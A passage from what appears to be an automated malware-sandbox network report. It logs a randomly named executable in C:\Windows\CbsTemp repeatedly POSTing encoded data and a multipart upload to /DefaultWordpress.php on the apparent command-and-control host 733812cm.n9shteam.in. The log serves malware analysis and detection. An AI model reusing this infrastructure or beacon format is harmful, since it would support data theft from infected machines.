                                                          Oct 20, 2024 18:18:34.041695118 CEST2520OUTData Raw: 5b 5e 5c 5d 5a 5a 54 50 54 5b 52 57 50 5a 57 52 50 58 5d 5e 50 57 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^\]ZZTPT[RWPZWRPX]^PWWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=0-X%1V+#('-(= X=,$'=Y&"#$89'.^<#F $P.<
                                                          Oct 20, 2024 18:18:34.474528074 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:35.146827936 CEST795INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BbUuClcWLPUvyVQgwkt%2BWue85tez%2BayRy84isbmOdkvTQjy5bTTIESfdNOm%2F0QnH0aWPkxKePAgSlOn8Z%2BtVAzKDscSX9xxC7UR%2FlXVV4K7%2BGEsyRVU40d00k9SKUUasBRr4yWb7zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5314e9af1828-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11676&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=125520&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:35.147418976 CEST795INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BbUuClcWLPUvyVQgwkt%2BWue85tez%2BayRy84isbmOdkvTQjy5bTTIESfdNOm%2F0QnH0aWPkxKePAgSlOn8Z%2BtVAzKDscSX9xxC7UR%2FlXVV4K7%2BGEsyRVU40d00k9SKUUasBRr4yWb7zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5314e9af1828-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11676&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=125520&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.549945188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:36.039418936 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:36.385966063 CEST2528OUTData Raw: 5b 5f 59 58 5f 5e 54 52 54 5b 52 57 50 5f 57 54 50 5c 5d 57 50 57 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [_YX_^TRT[RWP_WTP\]WPWW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>%=V+#$'8W<.\)70;_2_3;1$)+*#F $P.0
                                                          Oct 20, 2024 18:18:36.837785959 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:37.200413942 CEST797INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDc1R3LuLMa4vYR6DLR6kRqtI7VJjo%2By8OK1muCuJQ3xR8PEcM8MQPA%2B%2B%2FSZ7A%2FAn4iynSna7CV80vU7U%2BSMz74gU94iLAUhmJadvtBZgE2F1TQK6uaL0Ifv3b%2BmTnh%2BomcNvlOTBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5323be0567f4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11482&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=126961&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.549946188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:36.219856977 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:36.573015928 CEST1948OUTData Raw: 5e 5b 5c 52 5a 52 54 56 54 5b 52 57 50 59 57 5c 50 51 5d 56 50 54 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[\RZRTVT[RWPYW\PQ]VPTW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ^*!$;"?3;]'&?=<](/<$-&$^&]3(#F $P.(
                                                          Oct 20, 2024 18:18:37.481452942 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:38.702492952 CEST940INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98LmNJ9KbGsunzNN2vjDv%2BskT%2BIyKjO327MNlAgxnTqSuLolDpCglZqCO5Xp3thTWn5o67o66fi9q6ZljZMmOVdizfwjf%2B3r8Ju%2Bqz2F8FhvqHOBc0TdAXj0383UkP1ZxMdKqQ%2FWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5327bb4bcf09-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12424&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=125902&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 59 24 2c 27 54 3e 3f 30 54 2e 00 2e 0f 39 04 37 14 3a 08 21 58 25 33 2e 5e 31 3a 29 1e 26 33 33 5b 36 2c 0c 5a 21 2f 0f 10 39 0c 28 5e 07 12 26 5c 3d 2f 34 5d 29 5b 3f 01 3c 2b 37 04 36 27 30 1d 25 03 33 11 30 03 29 14 3e 1f 39 10 3d 03 00 1d 2e 37 3a 19 2d 3b 38 5d 22 2a 22 53 03 13 25 11 3d 1e 05 02 21 32 23 5a 3c 2d 23 59 3f 5e 22 1f 3d 33 3f 5a 3c 2b 27 12 2d 2d 25 01 24 11 38 5f 26 2c 28 58 26 03 3c 0d 27 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&Y$,'T>?0T..97:!X%3.^1:)&33[6,Z!/9(^&\=/4])[?<+76'0%30)>9=.7:-;8]"*"S%=!2#Z<-#Y?^"=3?Z<+'--%$8_&,(X&<'$^-/W6[O0
                                                          Oct 20, 2024 18:18:38.705341101 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:38.878670931 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:38.878834009 CEST2528OUTData Raw: 5e 5f 5c 53 5a 5f 54 51 54 5b 52 57 50 59 57 53 50 5a 5d 57 50 50 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^_\SZ_TQT[RWPYWSPZ]WPPWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ =0!X&!V(/^$(.?(Z=;'$&2#^'8$X=?#F $P.(
                                                          Oct 20, 2024 18:18:39.293513060 CEST799INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pUp8mWP1nWXsyoXLlb6FOmwLzYv6mTf%2F7A0yeQ6%2BV8aqux0EbYUbm%2FidUFTc%2FwPcbELeW7d7LDStZTc%2FIYUSmh9KJTEHLTlA%2Bsitaa%2Bg%2BUXiLUgGLQoJFP46kM3SejMoQ5evsfNEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53307bd8cf09-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12333&sent=7&recv=12&lost=0&retrans=0&sent_bytes=990&recv_bytes=5074&delivery_rate=233134&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.549949188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:36.320341110 CEST310OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:36.666632891 CEST540OUTData Raw: 5e 5b 59 5c 5a 5f 51 53 54 5b 52 57 50 58 57 54 50 5f 5d 5d 50 54 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[Y\Z_QST[RWPXWTP_]]PTWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)3&&+3+'?>$Y*(]0+Z%,30.:?#F $P.,
                                                          Oct 20, 2024 18:18:37.115701914 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:37.344726086 CEST792INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmPKnOxfI4U00syL4ypqc0RlwM%2B3U3wqhdGUT89CClzhBcK1PSt6aAi2pl0N904CY%2FMayjX1eXnkOVIT8nBvN2%2BAJdZIh3HRsA25TiQA42h%2FpFpD8%2BSZYFxSv8Vv5ek5%2Bia30VQYGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53257d2d69a2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11159&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=130756&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:37.345263958 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqm
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3014
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:37.509793997 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:37.510169029 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 33 6f 41 4f 64 69 49 6c 34 39 41 78 4c 50 6c 34 63 31 6b 43 4a 46 4b 38 71 6b 77 4f 69 7a 7a 6e 71 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqmContent-Disposition: form-data; name="0"Content-Type: text/plain^XYYZSTUT[RWP[W\P[]WPPWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:38.702883959 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RL28AiN80OgRQr0vA7lEXv%2FZzr%2FmBc8pNCOUjLuF9TQ%2BoKSSktIsPKDCpoIubBc8UkaQ9CQ6lmuNuDstBMtwtoLskNLYH4uuzEYKqbtXrbjGrl3sDZXRs5fIFzj%2B5qgXlFmLuM04vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5327eed869a2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11107&sent=7&recv=11&lost=0&retrans=0&sent_bytes=842&recv_bytes=4186&delivery_rate=261584&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.549960188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:39.444996119 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:39.792088032 CEST2520OUTData Raw: 5b 50 59 5f 5a 5c 54 52 54 5b 52 57 50 5a 57 5c 50 5b 5d 56 50 5c 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [PY_Z\TRT[RWPZW\P[]VP\WT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ =9[1;9R?3?]'+&?>8=/;'#124'8)3=&Y+:#F $P.
                                                          Oct 20, 2024 18:18:40.219455004 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:40.453820944 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNtiW43YIpajB0WK6mlm2EmGxDwLTVFwArudVRPWS63zo0fccZftNLkRacTSOiBHpGu4Ev0WemYfcHzDW71aQHMp35GlRm%2BJ5dG9rPLqzqLjkwdT0dLyhb%2FeTfRFKyyEuZ1MSO1QSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5338db4ccf23-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11115&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2807&delivery_rate=129772&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.549966188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:40.580960989 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2516
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:40.933163881 CEST2516OUTData Raw: 5e 5a 5c 5a 5a 5b 54 57 54 5b 52 57 50 5a 57 54 50 5b 5d 5e 50 5d 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^Z\ZZ[TWT[RWPZWTP[]^P]WZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ (39X&;>#'8?.(/8Z'-?^&0[%.Y+#F $P.,
                                                          Oct 20, 2024 18:18:42.321527004 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:42.557351112 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7l6w31%2FbhUISBuFL5E6cYTpfLD3QzAZhyY3N1IDwKxbPcaBLeaZTEjQNpnCYJzysFh3R53Rut1I3fFqm6QqK%2FP%2FczLYmKcKBb4bFfQ3HRLIWBZ0GEx5nrP7UoAdjTL2C3OZ%2FE71Hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5345fdaf980c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12954&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=112422&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.549975188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:42.804683924 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:43.150917053 CEST2528OUTData Raw: 5e 5d 59 5b 5a 5a 54 50 54 5b 52 57 50 59 57 5c 50 51 5d 57 50 5c 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]Y[ZZTPT[RWPYW\PQ]WP\W^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _)*%]><+Z$8+;(/<'0%"/Y3='X)+#F $P.(
                                                          Oct 20, 2024 18:18:43.588270903 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:43.816168070 CEST790INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1iF7Du0PhArnME948vgpIot2aexpvi2RfXP7LvxG1Bs2Bh03m2%2BXZ%2FID4LuIOMJjiAYt4bYVt6wq6EoLbmJ4NM%2FTgzkUGmrXJXY558LeXeot183MZYwU5hD%2B9C0tVNcF1qYWrTTGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a534deb68969a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11062&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130709&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.549979188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:43.719976902 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:44.073936939 CEST1948OUTData Raw: 5b 5b 59 5f 5a 5f 51 56 54 5b 52 57 50 5f 57 54 50 5f 5d 5d 50 56 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
